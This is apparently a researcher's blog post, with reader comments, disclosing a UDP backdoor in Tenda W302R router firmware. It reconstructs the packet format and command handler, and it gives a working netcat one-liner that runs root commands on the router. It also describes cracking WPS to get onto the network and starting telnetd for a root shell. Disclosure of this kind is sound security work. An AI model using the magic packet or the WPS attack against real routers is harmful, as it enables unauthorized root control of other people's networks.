From China, With Love

Lest anyone think that D-Link is the only vendor who puts backdoors in their products, here’s one that can be exploited with a single UDP packet, courtesy of Tenda.

After extracting the latest firmware for Tenda’s W302R wireless router, I started looking at /bin/httpd, which turned out to be the GoAhead webserver:

Server header string in /bin/httpd

Server header string in /bin/httpd

But Tenda has made a lot of special modifications themselves. Just before entering the HTTP receive loop, main calls InitMfgTask, which spawns the MfgThread function as a separate thread:

pthread_create(&var_10, 0, MfgThread, 0);

pthread_create(&var_10, 0, MfgThread, 0);

Hmmm…InitMfgTask and MfgThread? Related to manufacturing tasks perhaps? Iiiiiinteresting…

The first thing MfgThread does is create a UDP socket and bind it to port 7329:

Create UDP socket and bind to port 7329

Create UDP socket and bind to port 7329

The thread then goes into a recvfrom loop, reading up to 128 bytes from the socket. It expects each received UDP packet to be at least 14 bytes in length:

Read packet from socket and check packet size

Read packet from socket and check packet size

Now for the fun part; the received UDP packet is then parsed by this block of code:

Processing the received packet

Processing the received packet

In C, this code reads:

memset(rx_magic_string, 0, 0x80);
memset(command_byte, 0, 0x80);
memset(command_arg, 0, 0x80);

memcpy(rx_magic_string, rx_buf, 9);
command_byte[0] = rx_buf[11];
memcpy(command_arg, rx_buf+12, rx_size-12);

// If magic string doesn't match, stop processing this packet and wait for another packet
if(strcmp(rx_magic_string, "w302r_mfg") != 0) goto outer_receive_loop;

We can see that the thread is expecting a packet with the following structure:

struct command_packet_t
{
    char magic[10]; // 9 byte magic string ("w302r_mfg"), plus a NULL terminating byte
    char command_byte;
    char command_arg[117];
};

As long as the received packet starts with the string “w302r_mfg”, the code then compares the specified command byte against three ASCII characters (’1′, ‘x’, and ‘e’):

Comparing command_byte to '1', 'x' and 'e'

Comparing command_byte to ’1′, ‘x’ and ‘e’

For simplicity, I’ve converted the remaining disassembly (at least the important bits) to the following C code:

switch(command_byte)
{
    case 'e':
        strcpy(tx_buf, "w302r_mfg");
        tx_size = 9;
        break;
    case '1':
        if(strstr(command_arg, "iwpriv") != NULL)
            tx_size = call_shell(command_arg, tx_buf, 0x800);
        else
            strcpy(tx_buf, "000000");
            tx_size = strlen(tx_buf);
        break;
    case 'x':
        tx_size = call_shell(command_arg, tx_buf, 0x800);
        break;
    default:
        goto outer_receive_loop;
}

sendto(client_socket, tx_buf, tx_size, client_sock_addr, 16);
goto outer_receive_loop;

The following actions correspond to the three accepted command bytes:

  • ‘e’ – Responds with a pre-defined string, basically a ping test
  • ’1′ – Intended to allow you to run iwpriv commands
  • ‘x’ – Allows you to run any command, as root

If ‘x’ is specified as the command byte, the remainder of the packet after the command byte (called command_arg in the above code) is passed to call_shell, which executes the command via popen:

popen(command_arg, "r");

popen(command_arg, “r”);

What’s more, call_shell populates the tx_buf buffer with the output from the command, which, as we can see from the previous C code, is sent back to the client!

Knowing the functionality of MfgThread and its expected packet structure, we can easily exercise this backdoor with netcat:

$ echo -ne "w302r_mfg\x00x/bin/ls" | nc -u -q 5 192.168.0.1 7329
drwxr-xr-x    2 0        0            1363 webroot
drwxr-xr-x    1 0        0               0 var
drwxr-xr-x    5 0        0              43 usr
drwxr-xr-x    1 0        0               0 tmp
drwxr-xr-x    2 0        0               3 sys
drwxr-xr-x    2 0        0             569 sbin
dr-xr-xr-x   39 0        0               0 proc
drwxr-xr-x    2 0        0               3 mnt
drwxr-xr-x    1 0        0               0 media
drwxr-xr-x    4 0        0             821 lib
lrwxrwxrwx    1 0        0              11 init -> bin/busybox
drwxr-xr-x    2 0        0               3 home
drwxr-xr-x    7 0        0             154 etc_ro
drwxr-xr-x    1 0        0               0 etc
drwxr-xr-x    1 0        0               0 dev
drwxr-xr-x    2 1000     100           574 bin

One teensy-weensy, but ever so crucial little tiny detail is that the backdoor only listens on the LAN, thus it is not exploitable from the WAN. However, it is exploitable over the wireless network, which has WPS enabled by default with no brute force rate limiting. My shiny new ReaverPro box made relatively short work of cracking WPS, providing access to the WLAN and a subsequent root shell on the router (they also ship with a default WPA key, which you might want to try first):

ReaverPro cracking the WPS pin

ReaverPro cracking the WPS pin

Starting telnetd and getting a root shell

Starting telnetd and getting a root shell

As the magic string suggests, this backdoor was likely first implemented in Tenda’s W302R router, although it also exists in the Tenda W330R, as well as re-branded models, such as the Medialink MWN-WAPR150N. They all use the same “w302r_mfg” magic packet string.

UPDATE:

ea did a great job of grepping through various Tenda firmwares to find a lot more routers that are likely affected: http://ea.github.io/blog/2013/10/18/tenda-backdoor/

Bookmark the permalink.

92 Responses to From China, With Love

  1. virusdefender says:

    it’s mysterious…

  2. monky says:

    Chinese device has backdoor in router. wow… amazing!!!!

  3. Pingback: Tenda路由器后门? | USA is China

  4. cong ty luat says:

    from china with love. :V

    • craig is a born again as$h0le says:

      from usa, with hate/slander/politically motivated highly biased bullshit articles. first of all, you still need to crack the wps pwd, so how the fuck is this a backdoor. second, this is the second time u’ve only targeted any hardware that is even remotely related to china. the first was d-link (actually taiwan based). there are hundres of routers out there with exploits, nice to know you only narrow your selection based on some seedy agenda.

  5. Preston says:

    Some how, the source of this GoAhead was on github:

    https://github.com/socoola/yhrouter/blob/master/user/goahead/src/goahead.c

    Github record shows the repo was commited to github a year ago. It shows very clear how the backdoor “MfgThread” works.

    I’ve no idea where the source comes from, maybe leaked from a engineer? I guess Tenda doesn’t intent to opensource their firmware.

    • Craig says:

      Yeah, I saw that too (after I RE’d the firmware of course :P). It’s common for vendors to not release the source to any of their custom/customized binaries, even if they have a GPL release; it isn’t clear why the code got uploaded to github though.

  6. Jobs says:

    WHAT THE CHINE ROUTERS !!!
    I’m using f*** tenda wireless accesspoint…

    • Craig says:

      Well the good news is that the backdoor only listens on the LAN, so as long as you don’t have any untrusted users on your network and you disable WPS and use a strong WPA passphrase, you should be relatively safe.

    • Chinese Guy says:

      Are you telling me they will go near your house, check if your WPS is on, and sit there for several hours to crack the password just to spy on your unencrypted connections? Scaring your ISP to hand over your data is definitely more effective. This kind of obvious backdoor is more like the work of a newbie programmer who is cheap to hire, and wanted to test the firmware but forgot to remove it when releasing the firmware.

      • Craig says:

        I doubt this was a forgotten backdoor (though almost certainly the developers of these devices are newbies/cheap hires). Based on the function names alone this appears to be put in place intentionally for testing/debugging during manufacturing.

  7. ea says:

    Nice find, I grepped trough the different firmwares on tenda website : http://ea.github.io/blog/2013/10/18/tenda-backdoor/

  8. Veronique says:

    F** China device !

  9. Pingback: Kolejna tylna furtka w ruterach – wystarczy magiczny pakiet UDP | Zaufana Trzecia Strona

  10. Benny says:

    Great work, congratulations to your success! :)

  11. Pingback: NeoAtlantis/NERV | 【转载】腾达路由器后门导致root权限访问

  12. Jack says:

    Well, We should boycott chinese devices immediately!

  13. shadowlips says:

    I think the none-open-source device more dangerous in now time, like HuaWei router and switch, ZTE devices, We can’t imagine it……

  14. Pingback: .:[ d4 n3wS ]:. » Tenda : une backdoor dans les routeurs chinois

  15. Ahmed says:

    I’m just curious, what software are you using to do all amazing reversing engineering stuff?

  16. Somd5.com says:

    Hello,somd5.com ~~~~~Seeking testing

  17. Ahmed says:

    This doesn’t work on MWN-WAPR150N router. I’ve just tested it.

    • Craig says:

      Is it an MWN-WAPR150N or an MWN-WAPR150Nv2? The firmware for the MWN-WAPR150Nv2 is radically different and does not contain this backdoor. I have confirmed that the latest firmware for the MWN-WAPR150N (v11.8 at the time of this writing) does in fact have this same backdoor.

  18. HD Moore says:

    The GitHub sourced linked by Preston uses a different magic string. This may be even more common, with different magics for each vendor:

    if (strcmp(FlagBuf,”rlink_mfg”) != 0) {

    • Craig says:

      Interesting; I know that at least the W330R uses a Ralink chipset. It wouldn’t surprise me if this is code supplied by Ralink to vendors and Tenda just changed the magic string to their device’s model number.

  19. Pingback: Backdoor Found In D-Link Consumer Routers

  20. Pingback: В беспроводных маршрутизаторах Tenda и Medialink обнаружен бэкдор, активируемый UDP-пакетом | AllUNIX.ru — Всероссийский портал о UNIX-системах

  21. Pingback: From China, With Love | Rocketboom

  22. Eric Wang says:

    In china, I think TP-link is much better than D-link and Tenda,
    Tenda is just rubbish, it’s not easy to use,
    TP-link is much easier to use, but I am not sure does it have backdoor.

  23. muc in says:

    WHAT THE CHINE ROUTERS
    I’m using TPLINK wireless accesspoint

  24. Pingback: Backdoor en routers chinos Tenda

  25. Pingback: Tenda路由器后门,From China,With Love! | Betula’s Blog

  26. NoArmsNoLegsInOcean says:

    I keep my key under the mat in the backyard.

  27. Criação says:

    Hi Craig… really nice work indeed. I envy your skills…
    One question: Are you able to use that 64 characters long wpa psk key you got with Reaver? This is something that I was unable to solve in most cases.

    • Craig says:

      I don’t know if all affected devices do this, but the one I tested did give back a random 64 character key instead of the actual WPA key currently in use. The new Reaver has an option to disable wireless encryption once you know the WPS pin, which is what I used to get into the wireless network. It isn’t ideal, but most people would just think it was the router being buggy anyway, and even if they put another WPA key in place, uploading a backdoor to the router would let you keep access to the network.

  28. iddlebit says:

    Now might be a good time to mention OpenWRT

  29. Sally Zhang says:

    Has this router exists the backdoor ?
    No prodcut seems to be safe now!
    Telemax

  30. Pingback: How to prevent a UDP-based channel from turning into a "backdoor"?CopyQuery CopyQuery | Question & Answer Tool for your Technical Queries,CopyQuery, ejjuit, query, copyquery, copyquery.com, android doubt, ios question, sql query, sqlite quer

  31. Pingback: Root access backdoor discovered in Chinese Tenda Wireless Routers

  32. Pingback: 走近科学:在中国,有爱——腾达Tenda 路由器后门分析 | Panni_007 Security

  33. Pingback: Backdoor Found In Tenda Router Firmware | Mocana DeviceLine Blog

  34. ALIEN360 says:

    Hello, respect for the article. I can confirm that this backdoor doesn’t work on W316R, I had tried with 3 firmware versions, and with using both w302r_mfg and w316r_mfg, maybe there are different strings for all models.

  35. Pingback: D-Link hole-prober finds 'backdoor' in Chinese wireless routers | Techbait Tech News

  36. Pingback: ste williams – D-Link hole-prober finds ‘backdoor’ in Chinese wireless routers

  37. Pingback: Tenda keeps D-Link Company | The Security Shelf

  38. Pingback: From China with love | Tibetan I Tech

  39. mz2010@foxmail.com says:

    腾达在中国只是一个普通的产品,当然我想买M3000R。对于使用腾达的人来说只要无线密匙够复杂你完全是安全的。美国朋友们,你们从不生产便宜的产品,所以极少人折腾你们的产品。对于安全来说,正义的斯诺登所爆光的对我们来说腾达问题只是九牛一毛罢了。或许你可以看看跟美国网件相同价位的产品是否有漏洞。

    抵制中国产品你们的生活成本将爆炸性的增加。生活用品等基本来自中国。

    ——-来自中国的
    欢迎使用电邮交谈。

    • Hang says:

      It is interesting that the low price of Chinese products is an excuse of the backdoor. The backdoor is an ethical issue rather than a cost issue. Does the last paragraph a threat? Do you think it works?

      This is really a unique way of reasoning of Chinese Communists.

      把這類後門漏洞推諉於中國產品的低價格,確實有趣,但其實這關乎道德多於成本。此外,最後一段算不算恐嚇?

      中國共產黨的思維果然與眾不同。

      • mz2010@foxmail.com says:

        如果你使用山寨手机想要有苹果手机的效果是不可能的。其实我想说腾达的是因为低价格产品而没有去好好研究固件,这无可厚非是腾达的错,但我理解为:便宜货当玩具- -!我觉得你们的思想差别很大。比如:腾达这个不安全,你要腾达换产品!而我是能用就能,实在不安全就自己另外买一个。

        另外你问最后一段算不算恐嚇?我这样说是因为看到有人说抵制中国产品!算是我给他们科普一下。我只是想说:欢迎你们抵制中国产品!嘿嘿!

        另外政府的问题我在这里说不知道会不会违法,但有一句话要记住!:中国人不靠政府生活!跟美国完完全全不同。

        最后:您使用的是中文繁体字,能看懂但不会写。建议使用简体字。繁体字目前香港仍在使用。

  40. Pingback: Rotten routers? More brands found to contain hidden “backdoors” – Information security alerts and news

  41. Pingback: Router-Schwachstellen: Jetzt auch bei Netgear und Tenda - Nerd-Supreme

  42. Pingback: IT Secure Site » Blog Archive » Rotten routers? More brands found to contain hidden “backdoors”

  43. Pingback: Tenda Wireless Routers Feature Backdoor | HOTforSecurity

  44. Pingback: 中國騰達路由器藏有後門漏洞 | 網絡安全與隱私

  45. Pingback: 轉貼:中國騰達路由器藏有後門漏洞

  46. zucchini says:

    I have been having trouble unsquashing this filesystem…
    “SYNTAX: /usr/local/bin/unsquashfs [options] filesystem
    …helpinfo…
    Decompressors available:
    gzip
    lzo
    xz”

  47. Pingback: One Ping Only | TechSNAP 133 | Jupiter Broadcasting

  48. DS says:

    Worked on my Zonet/Tenda router(s). Only thing I found is that the telnetd actually asks for a username/password which I can’t find.

  49. Matrong says:

    Actually, Tenda just fix it by uploading the new patches. Gota say, I kind of like Tenda, I been using Tenda since 2009, got some issues on setup but great price and reliable, my w307r still works like a cham. I believe there are lots of folks like me just do not care the brand that much, but I aint letting someone just talk trash about the brand I like just like that.

    Here is the link of their explaination:
    http://www.tendacn.com/tendacn/Commany/show.aspx?articleid=2344

  50. Pingback: Tenda路由器后门,From China,With Love! | sky'自留地

  51. Pingback: Security News #0×56 | CyberOperations

  52. Pingback: Tenda无线路由器远程命令执行后门漏洞 | 产品经理公社

  53. Pingback: 中國騰達路由器藏有後門漏洞 | 網絡安全與隱私

  54. Pingback: ste williams – Tenda seals shut router backdoor found by D-Link hole-prober

  55. Pingback: Tenda seals shut router backdoor found by D-Link hole-prober | Techbait Tech News

  56. Pingback: Liquidmatrix Security Digest Podcast - Episode 34 - Liquidmatrix Security Digest Liquidmatrix Security Digest

  57. Pingback: 腾达Tenda 路由器后门分析

  58. Pingback: PrimalSec Podcast Episode #3 ← Primal Security Podcast

  59. Pingback: 我是如何在腾达路由器固件程序上发现漏洞的 | 天天三国杀

  60. Pingback: Root access backdoor discovered in Chinese Tenda Wireless Routers | Cyber Defense Magazine

  61. Pingback: Backdoor found in Chinese Tenda Wireless Routers, allows Root access to Hackers | My great WordPress blog

  62. Pingback: Intrusio Router backdoor reloaded…

Leave a Reply

Your email address will not be published. Required fields are marked *

You may use these HTML tags and attributes: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>